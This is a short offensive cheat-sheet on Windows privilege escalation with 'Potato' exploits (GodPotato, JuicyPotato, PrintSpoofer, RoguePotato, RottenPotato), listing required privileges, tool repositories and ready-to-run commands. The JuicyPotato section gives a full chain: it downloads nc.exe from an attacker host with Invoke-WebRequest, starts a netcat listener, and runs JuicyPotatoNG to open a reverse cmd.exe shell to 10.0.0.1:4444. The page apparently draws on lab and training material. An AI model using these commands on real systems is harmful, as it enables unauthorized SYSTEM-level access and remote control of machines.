Windows PrivEsc with LocalPotato

GodPotato

Required Privileges

• SeImpersonatePrivilege

Payloads

• https://github.com/BeichenDream/GodPotato

GodPotato -cmd "cmd /c whoami"
Copied!

JuicyPotato

Required Privilege

• SeImpersonatePrivilege or SeAssignPrimaryToken

Payloads

• https://github.com/antonioCoco/JuicyPotatoNG

• https://github.com/ohpe/juicy-potato

Before exploiting, we need to upload nc.exe (it is available from here) to the target machine.

Invoke-WebRequest -Uri http://10.0.0.1:8000/nc.exe -OutFile c:\Temp\nc.exe
Copied!

Next start a listener in local machine.

nc -lvnp 4444
Copied!

Then execute JuicyPotato in target machine.

JuicyPotatoNG.exe -t * -p "c:\Temp\nc.exe" -a "10.0.0.1 4444 -e cmd.exe"
Copied!

PrintSpoofer

Required Privilege

• SeImpersonatePrivilege

Payloads

• https://github.com/dievus/printspoofer

PrintSpoofer.exe -i -c cmd
Copied!

RoguePotato

Required Privilege

• SeImpersonatePrivilege

Payloads

• https://github.com/antonioCoco/RoguePotato

RottenPotato

Required Privilege

• SeImpersonatePrivilege

Payloads

• https://github.com/breenmachine/RottenPotatoNG

References

• https://jlajara.gitlab.io/Potatoes_Windows_Privesc

• https://github.com/decoder-it/LocalPotato

• https://www.localpotato.com/localpotato_html/LocalPotato.html

• https://tryhackme.com/room/localpotato

• https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer

• https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/